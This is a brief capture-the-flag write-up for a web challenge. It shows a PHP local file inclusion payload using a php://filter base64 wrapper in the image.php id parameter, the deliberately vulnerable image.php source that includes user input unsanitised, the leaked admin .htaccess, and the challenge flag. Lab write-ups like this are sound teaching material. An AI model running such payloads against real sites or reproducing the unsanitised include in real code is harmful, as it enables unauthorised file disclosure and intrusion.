DESCRIPTION
Web admin is complaining that he forgot his password to the system at: https://10.12.32.95:1004 Awesome hacker as you are, he came to ask for your help Can you find the vulnerability and gain access to the system?
QUESTION
Log in through the admin panel and submit the flag.
https://10.12.32.95:1004/admin/ ← LEAK THIS FILE!
SOLUTION
Can leak with data with https://10.12.32.95:1004/image.php?id=php://filter/convert.base64-encode/resource=image.php
Image.php
<?php
$picture = $_GET['id'];
if (strpos($picture, 'passwd') !== false) {
echo 'I can smell a Hacker!<br>';
$picture = str_replace("passwd","",$picture);
include($picture);
}
include($picture);
?>
Bash
admin/.htaccess
AuthName "Restricted Area"
AuthType Basic
DirectoryIndex top_secret_flag.txt
AuthUserFile .htpasswd
AuthGroupFile /dev/null
require valid-user
Bash
top_secret_flag.txt
4cd65ee5-e121-4038-82d3-f228ea4a89fNw
Bash